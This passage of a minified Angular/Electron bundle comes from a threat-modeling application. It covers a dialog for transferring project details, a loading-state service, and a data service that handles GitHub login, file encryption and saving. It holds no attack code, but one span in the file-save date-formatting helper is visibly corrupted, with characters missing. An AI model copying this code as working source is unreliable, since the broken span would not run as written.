i;this.AvailableProjects.push({key:e,name:e.name,tooltip:e.source==hn.GitHub?(null===(i=this.dataService.GetRepoOfFile(e))||void 0===i?void 0:i.name)+"/"+e.path:e.path})}),this.Details.push({Key:!1,Value:"dialog.transferproject.d.Participants"}),this.Details.push({Key:!1,Value:"dialog.transferproject.d.CharScope"}),this.Details.push({Key:!1,Value:"dialog.transferproject.d.ObjImpact"}),this.Details.push({Key:!1,Value:"dialog.transferproject.d.Assets"}),this.Details.push({Key:!1,Value:"dialog.transferproject.d.ThreatSources"}),this.Details.push({Key:!1,Value:"dialog.transferproject.d.ThreatIdentification"}),this.Details.push({Key:!1,Value:"dialog.transferproject.d.Tags"}),this.Details.push({Key:!1,Value:"dialog.transferproject.d.ExportTemplates"})}LoadProject(){const e=i=>{var n;0==(null===(n=i.Participants)||void 0===n?void 0:n.length)&&(this.Details.find(r=>"dialog.transferproject.d.Participants"==r.Value).Key=null),(null==i.GetProjectAssetGroup()||null==this.SourceProject.GetProjectAssetGroup())&&(this.Details.find(r=>"dialog.transferproject.d.Assets"==r.Value).Key=null),0==i.GetThreatSources().Sources.length&&(this.Details.find(r=>"dialog.transferproject.d.ThreatSources"==r.Value).Key=null),0==i.GetSystemThreats().length&&(this.Details.find(r=>"dialog.transferproject.d.ThreatIdentification"==r.Value).Key=null)};this.Details.forEach(i=>i.Key=!1),this.dataService.GetFile(this.SelectedProject.key).then(i=>{this.SourceProject=i,e(this.SourceProject)}).catch()}TransferProject(){this.TransferLog=this.sourceProject.Name+":\n",this.TransferLog+=this.translate.instant("dialog.transferproject.l.start")+"\n";const e=this.dataService.Project,i=this.SourceProject;this.Details.filter(n=>1==n.Key).forEach(n=>{if("dialog.transferproject.d.Participants"===n.Value)i.Participants.forEach(r=>{e.Participants.some(c=>c.Name==r.Name&&c.Email==r.Email)||(e.Participants.push({Name:r.Name,Email:r.Email}),this.TransferLog+=this.translate.instant("dialog.transferproject.l.createParticipant")+": "+r.Name+"\n")});else if("dialog.transferproject.d.CharScope"===n.Value){const r=i.GetCharScope(),c=e.GetCharScope();r.StepProperties.forEach(d=>{r[d].forEach(T=>c[d].push(T)),r[d].length>0&&(this.TransferLog+="Update: "+this.translate.instant("pages.modeling.charscope."+d)+"\n")})}else if("dialog.transferproject.d.ObjImpact"===n.Value){const r=i.GetObjImpact(),c=e.GetObjImpact();r.StepProperties.forEach(d=>{r[d].forEach(T=>c[d].push(T)),r[d].length>0&&(this.TransferLog+="Update: "+this.translate.instant("pages.modeling.objimpact."+d)+"\n")})}else if("dialog.transferproject.d.Assets"===n.Value){const r=i.GetProjectAssetGroup(),c=e.GetProjectAssetGroup();if(r&&c){const d=(q,Y)=>{const te=e.CreateMyData(Y);te.CopyFrom(q.Data),this.TransferLog+=this.translate.instant("dialog.transferproject.l.createMyData")+": "+te.Name+"\n"},T=(q,Y)=>{const te=e.CreateAssetGroup(Y);te.CopyFrom(q.Data),te.Data.assetGroupIDs=[],te.Data.associatedDataIDs=[],this.TransferLog+=this.translate.instant("dialog.transferproject.l.createAsset")+": "+te.Name+"\n",q.AssociatedData.forEach(pe=>d(pe,te)),q.SubGroups.forEach(pe=>T(pe,te))},k=(q,Y)=>{q.SubGroups.forEach(te=>{Y.SubGroups.some(pe=>pe.Name===te.Name)||T(te,Y)}),q.AssociatedData.forEach(te=>{Y.AssociatedData.some(pe=>pe.Name==te.Name)||d(te,Y)}),q.SubGroups.forEach(te=>{k(te,Y.SubGroups.find(pe=>pe.Name==te.Name))})};k(r,c)}}else if("dialog.transferproject.d.ThreatSources"===n.Value){const r=i.GetThreatSources(),c=e.GetThreatSources();r.Sources.forEach(d=>{if(!c.Sources.some(T=>T.Name==d.Name)){const T=e.CreateThreatActor();T.CopyFrom(d.Data),c.AddThreatActor(T),this.TransferLog+=this.translate.instant("dialog.transferproject.l.createThreatActor")+": "+T.Name+"\n"}})}else if("dialog.transferproject.d.ThreatIdentification"===n.Value){const r=e.GetSystemThreats();i.GetSystemThreats().forEach(c=>{if(!r.some(d=>d.Name==c.Name)){let d=this.dataService.Config.GetThreatCategory(c.ThreatCategory.ID);d||(d=this.dataService.Config.GetThreatCategories().find(Y=>Y.Name==c.ThreatCategory.Name)),d||(d=this.dataService.Config.GetThreatCategories()[0]);const T=e.CreateSystemThreat(d);T.CopyFrom(c.Data),T.ThreatCategory=d,T.Data.affectedAssetObjectIDs=[];const k=e.GetAssetGroups(),q=e.GetMyDatas();c.AffectedAssetObjects.forEach(Y=>{let te=k.find(pe=>Y.Name==pe.Name);te||(te=q.find(pe=>Y.Name==pe.Name)),te&&(T.AffectedAssetObjects=[...T.AffectedAssetObjects,te])}),this.TransferLog+=this.translate.instant("dialog.transferproject.l.createSystemThreat")+": "+T.Name+"\n"}})}else"dialog.transferproject.d.Tags"===n.Value?i.GetMyTags().forEach(r=>{if(!e.GetMyTags().some(c=>c.Name==r.Name)){const c=e.CreateMyTag();c.CopyFrom(r.Data),this.TransferLog+=this.translate.instant("dialog.transferproject.l.createTag")+": "+c.Name+"\n"}}):"dialog.transferproject.d.ExportTemplates"===n.Value&&i.GetExportTemplates().forEach(r=>{if(!e.GetExportTemplates().some(c=>c.Name==r.Name)){const c=e.CreateExportTemplate();c.CopyFrom(r.Data),this.TransferLog+=this.translate.instant("dialog.transferproject.l.createExportTemplate")+": "+c.Name+"\n"}})}),this.Details.forEach(n=>n.Key=!1),this.UpdateAllDetails(),this.SelectedProject=null,this.SourceProject=null,this.TransferLog+=this.translate.instant("dialog.transferproject.l.finished")+"\n",this.dataService.ConsistencyCheck().then(n=>{n?this.messageService.Success("messages.success.transferedProjectDetails"):this.messageService.Warning("messages.warning.transferedProjectDetails")})}UpdateAllDetails(){this.AllDetails=this.Details.filter(e=>null!=e.Key).every(e=>e.Key)}SomeDetails(){return this.Details.filter(e=>e.Key).length>0&&!this.AllDetails}SetAll(e){this.AllDetails=e,this.Details.filter(i=>null!=i.Key).forEach(i=>i.Key=e)}GetIcon(e){return e.key.source==hn.FileSystem?"file_present":"cloud_queue"}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi),Ee(A2),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-transfer-project-dialog"]],decls:75,vars:36,consts:[["mat-dialog-title",""],["appearance","fill",2,"width","500px"],[3,"value","valueChange","selectionChange"],["style","vertical-align: bottom;",4,"ngIf"],["matTooltipShowDelay","1000",3,"value","matTooltip",4,"ngFor","ngForOf"],["mat-raised-button","",3,"disabled","click"],["mat-raised-button","","color","primary","matTooltipShowDelay","1000",2,"margin-left","50px",3,"disabled","matTooltip","click"],[2,"margin-top","20px"],[1,"detail-list-section"],["color","primary",1,"detail-margin",3,"disabled","checked","indeterminate","change"],[4,"ngFor","ngForOf"],["matInput","","readonly","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"disabled","ngModel","ngModelChange"],["align","end"],["mat-button","","mat-dialog-close",""],[2,"vertical-align","bottom"],["matTooltipShowDelay","1000",3,"value","matTooltip"],["color","primary",3,"disabled","ngModel","ngModelChange"]],template:function(e,i){1&e&&(m(0,"h2",0),s(1),oe(2,"translate"),u(),s(3,"\n"),m(4,"mat-dialog-content"),s(5,"\n "),m(6,"mat-form-field",1),s(7,"\n "),m(8,"mat-label"),s(9),oe(10,"translate"),u(),s(11,"\n "),m(12,"mat-select",2),he("valueChange",function(r){return i.SelectedProject=r})("selectionChange",function(){return i.SourceProject=null}),s(13,"\n "),m(14,"mat-select-trigger"),s(15,"\n "),ne(16,fOe,2,1,"mat-icon",3),s(17),u(),s(18,"\n "),m(19,"mat-option"),s(20),oe(21,"translate"),u(),s(22,"\n "),ne(23,pOe,5,4,"mat-option",4),s(24,"\n "),u(),s(25,"\n "),u(),s(26,"\n "),it(27,"br"),s(28,"\n "),m(29,"button",5),he("click",function(){return i.LoadProject()}),s(30),oe(31,"translate"),u(),s(32,"\n "),m(33,"button",6),he("click",function(){return i.TransferProject()}),oe(34,"translate"),s(35),oe(36,"translate"),u(),s(37,"\n "),it(38,"br"),s(39,"\n "),m(40,"div",7),s(41,"\n "),m(42,"span",8),s(43,"\n "),m(44,"mat-checkbox",9),he("change",function(r){return i.SetAll(r.checked)}),s(45),oe(46,"translate"),u(),s(47,"\n "),u(),s(48,"\n "),m(49,"span",8),s(50,"\n "),m(51,"ul"),s(52,"\n "),ne(53,_Oe,6,5,"li",10),s(54,"\n "),u(),s(55,"\n "),u(),s(56,"\n "),u(),s(57,"\n "),it(58,"br"),s(59,"\n "),m(60,"mat-form-field",1),s(61,"\n "),m(62,"mat-label"),s(63,"Log"),u(),s(64,"\n "),m(65,"textarea",11),he("ngModelChange",function(r){return i.TransferLog=r}),u(),s(66,"\n "),u(),s(67,"\n"),u(),s(68,"\n"),m(69,"mat-dialog-actions",12),s(70,"\n "),m(71,"button",13),s(72),oe(73,"translate"),u(),s(74,"\n"),u()),2&e&&(g(1),ke(re(2,20,"dialog.transferproject.title")),g(8),ke(re(10,22,"dialog.transferproject.SelectSourceProject")),g(3),F("value",i.SelectedProject),g(4),F("ngIf",i.SelectedProject),g(1),ct("\xa0",null==i.SelectedProject?null:i.SelectedProject.name,"\n "),g(3),ke(re(21,24,"properties.selectNone")),g(3),F("ngForOf",i.AvailableProjects),g(6),F("disabled",!i.SelectedProject),g(1),ke(re(31,26,"dialog.transferproject.LoadProject")),g(3),at("matTooltip",re(34,28,"dialog.transferproject.TransferDetails.tt")),F("disabled",!i.SourceProject||!i.SomeDetails()&&!i.AllDetails),g(2),ke(re(36,30,"dialog.transferproject.TransferDetails")),g(9),F("disabled",!i.SourceProject)("checked",i.AllDetails)("indeterminate",i.SomeDetails()),g(1),ct("\n ",re(46,32,"dialog.transferproject.Details"),"\n "),g(8),F("ngForOf",i.Details),g(12),F("disabled",!i.TransferLog)("ngModel",i.TransferLog),g(7),ke(re(73,34,"general.Close")))},dependencies:[Zi,Ri,an,Ta,Ea,oa,br,da,nn,un,Nr,jge,yr,Go,Xa,Pa,vm,Am,Tm,Em,Xi],styles:[".detail-section[_ngcontent-%COMP%]{margin:12px 0}.detail-margin[_ngcontent-%COMP%]{margin:0 12px}ul[_ngcontent-%COMP%]{list-style-type:none;margin-top:4px}"]}),t})();class COe{constructor(a=!0,e=!0,i){this.value=a,this.source=e,this.unique=i}isSame(a=!0,e){return!!(a===this.source||a===this.value||this.unique&&e&&this.unique===e)}}let QG=(()=>{class t{constructor(){this.defaultKey="default",this.loadingSubjects=new Map,this.loadingStacks=new Map,this.loadingKeyIndex=new Map}isLoading$(e={}){if(Array.isArray(e.key)){if(0===e.key.length)throw new Error("Must provide at least one key when passing an array of keys");return mg(e.key.map(n=>this.isLoading$({key:n}))).pipe(Xe(n=>n.some(r=>r)),Bh())}const i=this.normalizeKeys(e.key);return new G(n=>{this.indexKeys(i);const r=this.loadingSubjects.get(i[0]).pipe(Bh()).subscribe(n);return()=>{r.unsubscribe(),i.forEach(c=>this.deIndexKey(c))}})}isLoading(e={}){return this.normalizeKeys(e.key).map(n=>{var r,c;return null!==(c=null===(r=this.loadingSubjects.get(n))||void 0===r?void 0:r.value)&&void 0!==c&&c}).some(n=>n)}add(e,i){const n=i||!(e instanceof Promise||e instanceof I||e instanceof G)&&e||void 0;let r,c;const d=k=>()=>this.remove(k,n),T=this.normalizeKeys(null==n?void 0:n.key);if(e instanceof I||e instanceof G){if(c=e,r=T.map(e instanceof G?()=>e.pipe(Cn(1)).subscribe():()=>e),r[0].closed)return e;r.forEach(k=>k.add(d(k)))}else e instanceof Promise&&(c=e,r=T.map(()=>e),r.forEach(k=>k.then(d(e),d(e))));return this.indexKeys(T),T.forEach((k,q)=>{const Y=r&&r[q],te=this.loadingStacks.get(k);if(null!=n&&n.unique){const pe=te.findIndex(Re=>Re.isSame(Y,null==n?void 0:n.unique));if(pe>=0){const Re=te.splice(pe,1)[0];Re.source instanceof G&&Re.value.unsubscribe()}}te.push(new COe(Y,e instanceof G?e:Y,null==n?void 0:n.unique)),this.updateLoadingStatus(k)}),c}remove(e,i){let r,n=i;e instanceof I||e instanceof Promise||e instanceof G?r=e:n=e;const c=this.normalizeKeys(null==n?void 0:n.key);for(const d of c){const T=this.loadingStacks.get(d);if(!T)continue;const k=T.findIndex(Y=>Y.isSame(r));if(k<0)continue;const q=T.splice(k,1)[0];r instanceof G&&q.source===r&&q.value.unsubscribe(),this.updateLoadingStatus(d),this.deIndexKey(d)}}clear(e){const i=null!=e&&e.key?this.normalizeKeys(e.key):Array.from(this.loadingStacks.keys());for(const n of i){const r=this.loadingStacks.get(n);if(r){for(const c of r)c.source instanceof G&&c.value.unsubscribe(),this.deIndexKey(n);this.loadingStacks.has(n)&&this.loadingStacks.set(n,[]),this.updateLoadingStatus(n)}}}normalizeKeys(e){return e?Array.isArray(e)||(e=[e]):e=[this.defaultKey],e}indexKeys(e){for(const i of e)if(this.loadingKeyIndex.has(i)){const n=this.loadingKeyIndex.get(i);this.loadingKeyIndex.set(i,n+1)}else{const n=new zs(!1);this.loadingKeyIndex.set(i,1),this.loadingSubjects.set(i,n),this.loadingStacks.set(i,[])}}deIndexKey(e){const i=this.loadingKeyIndex.get(e);1===i?(this.loadingKeyIndex.delete(e),this.loadingSubjects.delete(e),this.loadingStacks.delete(e)):this.loadingKeyIndex.set(e,i-1)}updateLoadingStatus(e){var i,n,r;const d=(null!==(n=null===(i=this.loadingStacks.get(e))||void 0===i?void 0:i.length)&&void 0!==n?n:0)>0;null===(r=this.loadingSubjects.get(e))||void 0===r||r.next(d)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();new ni("SW_IS_LOADING_DIRECTIVE_CONFIG");let ST=(()=>{class t{constructor(){this.isElectron&&(this.ipcRenderer=window.require("electron").ipcRenderer,this.webFrame=window.require("electron").webFrame,this.fs=window.require("fs"),this.childProcess=window.require("child_process"),this.childProcess.exec("node -v",(e,i,n)=>{e?console.error(`error: ${e.message}`):n?console.error(`stderr: ${n}`):console.log(`stdout:\n${i}`)}))}get isElectron(){return!!(window&&window.process&&window.process.type)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();var O5=de(5449).Buffer,Es=(()=>{return(t=Es||(Es={}))[t.Project=1]="Project",t[t.Config=2]="Config",Es;var t})(),hn=(()=>{return(t=hn||(hn={}))[t.Import=1]="Import",t[t.FileSystem=2]="FileSystem",t[t.GitHub=3]="GitHub",hn;var t})(),Wr=(()=>{return(t=Wr||(Wr={}))[t.None=0]="None",t[t.Guest=1]="Guest",t[t.LoggedIn=2]="LoggedIn",Wr;var t})();let Yi=(()=>{class t{constructor(e,i,n,r,c,d,T,k,q,Y,te){if(this.locStorage=e,this.isLoading=i,this.http=n,this.router=r,this.clipboard=c,this.dialog=d,this.messagesService=T,this.translate=k,this.fileUpdate=q,this.zone=Y,this.electron=te,this.hasSpellCheck=null,this.userMode=Wr.None,this.repos=[],this.availableFiles=[],this.NewVersionAvailable=null,this.ProjectChanged=new Tt,this.ProjectSaved=new Tt,this.ConfigChanged=new Tt,this.isLoggingIn=!1,this.blockLoading=!1,this.checkAppVersionUpdate(),this.restoreUserAccount(),this.UserMode==Wr.None&&"true"==this.locStorage.Get(si.AUTH_GUEST)&&(this.userMode=Wr.Guest),(this.UserMode==Wr.LoggedIn||this.UserMode==Wr.Guest)&&this.retrieveRepositories(),this.Config=Wu.DefaultFile(),setTimeout(()=>{(new Rl).repos.listReleases({owner:"SecSimon",repo:"TTM"}).then(({data:Re})=>{const Fe=Re.find(Ne=>this.isNewVersion(Ne.tag_name,uf_i));Fe&&(this.messagesService.Info(Gi.Format(this.translate.instant("messages.info.newVersion"),Fe.tag_name)),setTimeout(()=>{this.NewVersionAvailable=Fe.tag_name},1500))})},12e3),this.electron.isElectron&&this.electron.ipcRenderer){this.electron.ipcRenderer.on("oncode",(Re,Fe)=>{this.zone.run(()=>this.LogIn(Fe))}),this.electron.ipcRenderer.on("OnNew",()=>{this.zone.run(()=>this.OnNewProject())}),this.electron.ipcRenderer.on("OnSave",()=>{this.zone.run(()=>this.OnSave())}),this.electron.ipcRenderer.on("OnSaveAs",()=>{this.zone.run(()=>this.OnSave(!0))}),this.electron.ipcRenderer.on("OnLocalDownload",()=>{this.zone.run(()=>this.OnSave(null,!0))}),this.electron.ipcRenderer.on("OnCloseFile",()=>{this.zone.run(()=>this.OnCloseFile())}),this.electron.ipcRenderer.on("OnOpenFile",(Re,Fe,Ne)=>{this.zone.run(()=>{this.IsLoggedIn||this.GuestLogin(),this.OnCloseFile().then(()=>{const et=JSON.parse(Fe);this.locStorage.Remove(si.LAST_FILE),this.OnLoadFile({source:hn.FileSystem,importData:et,path:Ne,name:this.GetFileName(Ne),isEncrypted:null,type:null})})})}),this.electron.ipcRenderer.send("RendererReady");const pe=this.getLastFileHistory().filter(Re=>Re.source==hn.FileSystem);pe.length>0&&this.electron.ipcRenderer.send("ExistFiles",pe.map(Re=>Re.path)),this.electron.ipcRenderer.on("ExistFilesCallback",(Re,Fe)=>{this.zone.run(()=>{Fe.forEach(et=>this.addFileToAvailableFiles(pe.find(ut=>ut.path==et&&ut.source==hn.FileSystem)));const Ne=this.locStorage.Get(si.LAST_FILE);if(Ne){const et=JSON.parse(Ne);if(et.source==hn.FileSystem){const ut=this.AvailableFiles.find(Ze=>Ze.source==hn.FileSystem&&Ze.path==et.path);ut&&(this.IsLoggedIn||this.GuestLogin(),this.messagesService.Info(Gi.Format(this.translate.instant("messages.info.loadFile"),ut.name)),this.OnLoadFile(ut))}}})})}}get selectedFile(){return this._selectedFile}set selectedFile(e){this._selectedFile=e,e&&this.addFileToHistory(e)}get UserMode(){return this.userMode}get IsLoggedIn(){return this.UserMode==Wr.LoggedIn}get IsGuest(){return this.UserMode==Wr.Guest}get KeepUserSignedIn(){let e=this.locStorage.Get(si.AUTH_KEEP_SIGNED_IN);return null==e?(this.locStorage.Set(si.AUTH_KEEP_SIGNED_IN,String(!0)),!0):"true"==e}set KeepUserSignedIn(e){this.locStorage.Set(si.AUTH_KEEP_SIGNED_IN,String(e))}get UserName(){return this.userName}get UserAccount(){return this.userAccount}get UserURL(){return this.userURL}get UserEmail(){return this.userEmail}get UserDisplayName(){return Gi.NullOrEmpty(this.UserName)?this.UserAccount:this.UserName}get Repos(){return this.repos}get SelectedFile(){return this.selectedFile}get SelectedGHFile(){var e;return(null===(e=this.selectedFile)||void 0===e?void 0:e.source)==hn.GitHub?this.SelectedFile:null}get SelectedFSFile(){var e;return(null===(e=this.selectedFile)||void 0===e?void 0:e.source)==hn.GitHub?this.SelectedFile:null}get AvailableFiles(){return this.availableFiles}get AvailableProjects(){return this.availableFiles.filter(e=>e.type==Es.Project)}get AvailableConfigs(){return this.availableFiles.filter(e=>e.type==Es.Config)}get AvailableFSProjects(){return this.availableFiles.filter(e=>e.source==hn.FileSystem&&e.type==Es.Project)}get AvailableFSConfigs(){return this.availableFiles.filter(e=>e.source==hn.FileSystem&&e.type==Es.Config)}get AvailableGHProjects(){return this.availableFiles.filter(e=>e.source==hn.GitHub&&e.type==Es.Project)}get AvailableGHConfigs(){return this.availableFiles.filter(e=>e.source==hn.GitHub&&e.type==Es.Config)}get HasProject(){return null!=this.Project}get Project(){return this.project}set Project(e){this.project!=e&&(e&&e.TTModelerVersion&&this.isNewVersion(e.TTModelerVersion,uf_i)&&(this.messagesService.Error(Gi.Format(this.translate.instant("messages.error.newerFileVersion"),e.TTModelerVersion)),e=null),this.project=e,e?(this.project.FileChanged=!1,e.TTModelerVersion=uf_i,this.Config=e.Config,this.Config.ProjectFile=e,this.project.DataChanged.subscribe(()=>{this.startUnsavedChangesTimer()})):this.stopUnsavedChangesTimer(),this.ProjectChanged.emit(e))}get Config(){return this.config}set Config(e){this.config=e,this.ConfigChanged.emit(e)}get CanSaveFile(){var e;return(null===(e=this.SelectedFile)||void 0===e?void 0:e.source)!=hn.GitHub||this.GetRepoOfFile(this.SelectedFile).isWritable}get CanSaveProject(){return this.CanSaveFile&&null!=this.Project}get HasUnsavedChanges(){var e;return this.Project?this.Project.FileChanged:null===(e=this.Config)||void 0===e?void 0:e.FileChanged}get HasSpellCheck(){if(null==this.hasSpellCheck){const e=this.locStorage.Get(si.SPELL_CHECK);this.hasSpellCheck="true"==e||null==e}return this.hasSpellCheck}set HasSpellCheck(e){this.hasSpellCheck=e,this.locStorage.Set(si.SPELL_CHECK,String(e))}LogIn(e){if(!this.isLoggingIn&&this.locStorage.Get(si.AUTH_LAST_CODE)!=e)try{this.isLoggingIn=!0,this.isLoading.add(),this.clearLoginData();const i={headers:new du({"Content-Type":"text/plain"}),responseType:"text"};this.http.post("https://1tvzjyylrh.execute-api.us-east-2.amazonaws.com/default/GithubAuthHandler",JSON.stringify({code:e}),i).subscribe(n=>{n.includes("access_token")?(this.accessToken=n.split("&")[0].split("=")[1],this.userMode=Wr.LoggedIn,this.KeepUserSignedIn&&(this.locStorage.Set(si.AUTH_ACCESS_TOKEN,this.accessToken),this.locStorage.Set(si.AUTH_LAST_CODE,e)),this.messagesService.Success("messages.success.githubauth"),this.retrieveUser()):this.messagesService.Error("messages.error.githubauth",n),this.isLoading.remove(),this.isLoggingIn=!1},n=>{this.messagesService.Error("messages.error.githubauth",n),this.isLoading.remove(),this.isLoggingIn=!1})}catch(i){this.messagesService.Error("messages.error.githubauth",i),this.isLoading.remove(),this.isLoggingIn=!1}}GuestLogin(){this.userMode=Wr.Guest,this.locStorage.Set(si.AUTH_GUEST,String(!0)),this.retrieveRepositories(),this.router.navigate(["/"])}LogOut(){this.OnCloseFile().then(()=>{this.clearLoginData(),this.AvailableFiles.forEach(e=>{e.source==hn.GitHub&&"SecSimon"!=this.GetRepoOfFile(e).owner&&this.removeFileFromAvailableFiles(e)}),this.messagesService.Info("messages.info.logout"),this.router.navigate(["/"])})}OnNewProject(e=null){this.isLoading.add(),this.OnCloseFile().then(()=>{this.selectedFile=null;const i=n=>{n.Data.ID=Fo();const r=new mf({},n);r.InitializeNewProject(),r.CreateDiagram(xn.DataFlow),r.Name="Project.ttmp",this.selectedFile={source:hn.Import,type:Es.Project,name:r.Name,isEncrypted:null,path:null},this.Project=r,this.locStorage.Remove(si.LAST_FILE),this.isLoading.remove()};e?this.GetFile(e).then(n=>i(n)).catch(n=>this.messagesService.Error(n)):i(Wu.DefaultFile())})}OnLoadFile(e){const i=this.locStorage.Get(si.LAST_FILE);this.OnCloseFile().then(()=>{if(e.source==hn.GitHub&&i){const n=JSON.parse(i);if(this.compareFiles(e,n)&&e.sha!=n.sha)return this.isLoading.remove(),void this.messagesService.Error("messages.error.githuboutdatedfile")}this.selectedFile=e,this.GetFile(e).then(n=>{n instanceof mf?(this.Project=n,this.messagesService.Success("messages.success.loadProject",e.name)):n&&(this.Config=n,this.Project=null,this.messagesService.Success("messages.success.loadConfig",e.name))}).catch(n=>{this.messagesService.Error(n)})})}ImportFile(e){if(e.target.files&&e.target.files[0]){const i=new FileReader,n=this.electron.isElectron?e.target.files[0].path:e.target.files[0].name;i.onload=r=>{const d=JSON.parse(i.result.toString());this.OnLoadFile({path:n,name:this.GetFileName(n),source:hn.Import,type:null,isEncrypted:null,importData:d})},i.readAsText(e.target.files[0])}}GetFile(e){return new Promise((i,n)=>{this.isLoading.add();const r=(c,d)=>{const T=(k,q)=>{if("content"in k){const te=JSON.parse(k.content);d.type=null!=te.config?Es.Project:Es.Config,d.type==Es.Project?(this.fileUpdate.UpdateProjectFile(te),te.Data.Name=d.name,i(mf.FromJSON(te))):(this.fileUpdate.UpdateConfigFile(te),te.Data.Name=d.name,i(Wu.FromJSON(te)))}else n("Unsupported file")};if("encrypted"in c){const k=(q,Y)=>{const te={pw:"",file:d.name};this.isLoading.add(),this.dialog.open(dwe,{hasBackdrop:!1,data:te}).afterClosed().subscribe(Re=>{if(Re)try{this.fileContentCrypto=new y5(te.pw),this.fileContentCrypto.Decrypt(q.encrypted),q.content=JSON.parse(this.fileContentCrypto.Decrypt(q.content)),delete q.encrypted,T(q)}catch(Fe){this.messagesService.Warning("messages.warning.wrongPassword"),k(q,Y)}finally{this.isLoading.remove()}else this.isLoading.remove()})};d.isEncrypted=!0,k(c,d)}else T(c)};if(e.importData){const c=e.importData;e.importData=null,r(c,e),this.isLoading.remove()}else e.source==hn.GitHub?(this.UserMode==Wr.LoggedIn?new Rl({auth:this.accessToken}):new Rl).git.getBlob({owner:this.GetRepoOfFile(e).owner,repo:this.GetRepoOfFile(e).name,file_sha:e.sha}).then(({data:d})=>{const T=JSON.parse(O5.from(d.content,"base64").toString());r(T,e)}).catch(d=>{this.messagesService.Error("messages.error.githubfetch",d)}).finally(()=>{this.isLoading.remove()}):e.source==hn.FileSystem&&(0==this.electron.ipcRenderer.listenerCount("ReadFileCallback")&&this.electron.ipcRenderer.on("ReadFileCallback",(c,d,T)=>{this.zone.run(()=>{try{const k=JSON.parse(d);r(k,e)}catch(k){console.log(k)}finally{this.isLoading.remove()}}),this.electron.ipcRenderer.removeAllListeners("ReadFileCallback")}),this.electron.ipcRenderer.send("ReadFile",e.path))})}ReloadFile(){if(this.SelectedFile){const e=this.SelectedFile;this.OnCloseFile().then(()=>{this.OnLoadFile(e)})}}RestoreCommit(e){const i=this.UserMode==Wr.LoggedIn?new Rl({auth:this.accessToken}):new Rl,n=this.SelectedFile;i.repos.getCommit({owner:this.GetRepoOfFile(n).owner,repo:this.GetRepoOfFile(n).name,ref:e.sha}).then(({data:r})=>{var c;if(1==(null===(c=r.files)||void 0===c?void 0:c.length)&&r.files[0].filename==this.SelectedFile.path){const d=JSON.parse(JSON.stringify(this.SelectedFile));d.sha=r.files[0].sha,this.OnLoadFile(d)}})}OnSave(e=!1,i=!1,n=!1){return new Promise((r,c)=>{this.ConsistencyCheck().then(d=>{var T,k;const q=(pe,Re)=>{const Fe=new Blob([Re],{type:"text/plain;charset=utf-8"}),Ne=new Date,et=pe.split("."),ut=[Ne.getFullYear(),Ne.getMonth()+1,Ne.getDate()],Ze=[Ne.getHours(),Ne.getMinutes(),Ne.getSeconds()],yt=(It,St=2)=>{let Nt=It.toString();for(;Nt.lengthyt(It)),"_",...Ze.map(It=>yt(It)),"."),(0,yM.saveAs)(Fe,et.join("")),r()},Y=(pe,Re,Fe,Ne,et,ut,Ze,yt,It=null)=>{this.isLoading.add();const St=this.getFileContent(Ze,yt,It);return new Rl({auth:this.accessToken}).rest.repos.createOrUpdateFileContents({owner:Re,repo:Fe,path:Ne,message:0==et.length?"Update":et,content:O5.from(St).toString("base64"),sha:ut,committer:{name:this.UserAccount,email:this.UserEmail}}).then(({data:oi})=>{pe(oi)}).catch(oi=>{409==oi.status&&oi.message.includes("does not match")?this.messagesService.Error("messages.error.githubSHAmismatch"):this.messagesService.Error("messages.error.githubpush",oi)}).finally(()=>this.isLoading.remove())},te=!(null===(T=this.SelectedFile)||void 0===T||!T.isEncrypted);if(n&&i){this.isLoading.add();let pe=this.Config.Name;this.Project&&(pe=this.Project.Name.replace(".ttmp",".ttmc")),pe.endsWith(".ttmc")||(pe+=".ttmc"),q(pe,this.getFileContent(this.Config.ToJSON(),te)),this.isLoading.remove()}else{const pe=(null===(k=this.SelectedFile)||void 0===k?void 0:k.type)!=Es.Project||n?this.Config:this.Project;let Re="";if(n?Re=this.SelectedFile.name.replace(".ttmp",".ttmc"):this.SelectedFile?Re=this.SelectedFile.name:this.Project?Re=this.Project.Name+(this.Project.Name.endsWith(".ttmp")?"":".ttmp"):this.Config&&(Re=this.Config.Name+(this.Config.Name.endsWith(".ttmc")?"":".ttmc")),pe.Name=Re,this.SelectedFile?this.SelectedFile.source!=hn.GitHub||this.GetRepoOfFile(this.SelectedFile).isWritable?this.SelectedFile.source!=hn.Import||this.IsLoggedIn?e&&this.SelectedFile.type==Es.Config&&this.IsLoggedIn&&(n=!0):i=!0:this.IsLoggedIn?e=!0:i=!0:i=!0,n)if(this.UserMode==Wr.LoggedIn){const Fe={msg:""};Fe.newConfig={source:hn.GitHub,type:Es.Config,name:"",path:"",repoId:null,isEncrypted:te,sha:null},te&&(Fe.removePW=!1),this.dialog.open(GG,{hasBackdrop:!1,data:Fe}).afterClosed().subscribe(et=>{if(et)if(null!=Fe.newConfig){const ut=Fe.newConfig;this.selectedFile=ut,this.Project||(this.Config.Name=ut.name),Y(yt=>{ut.sha=yt.content.sha,this.addFileToAvailableFiles(ut),this.messagesService.Success("messages.success.saveConfig",ut.name),r()},this.GetRepoOfFile(ut).owner,this.GetRepoOfFile(ut).name,ut.path,Fe.msg,ut.sha,this.Config.ToJSON(),(null!=Fe.pw||te)&&!Fe.removePW,Fe.pw)}else console.log("Should this happen?");else r()})}else console.error("not logged in");else if(i)this.isLoading.add(),q(Re,this.getFileContent(pe.ToJSON(),te)),this.isLoading.remove();else{const Fe=Ne=>{this.addFileToAvailableFiles(Ne),this.SelectedFile.type==Es.Project?(this.messagesService.Success("messages.success.saveProject",this.Project.Name),this.ProjectSaved.emit(this.Project)):(this.messagesService.Success("messages.success.saveConfig",this.Config.Name),this.ConfigChanged.emit(this.Config)),setTimeout(()=>{this.Project&&(this.Project.FileChanged=!1),this.Config&&(this.Config.FileChanged=!1)},500),this.stopUnsavedChangesTimer(),r()};if([hn.GitHub,hn.Import].includes(this.SelectedFile.source)||this.UserMode==Wr.LoggedIn&&e){const 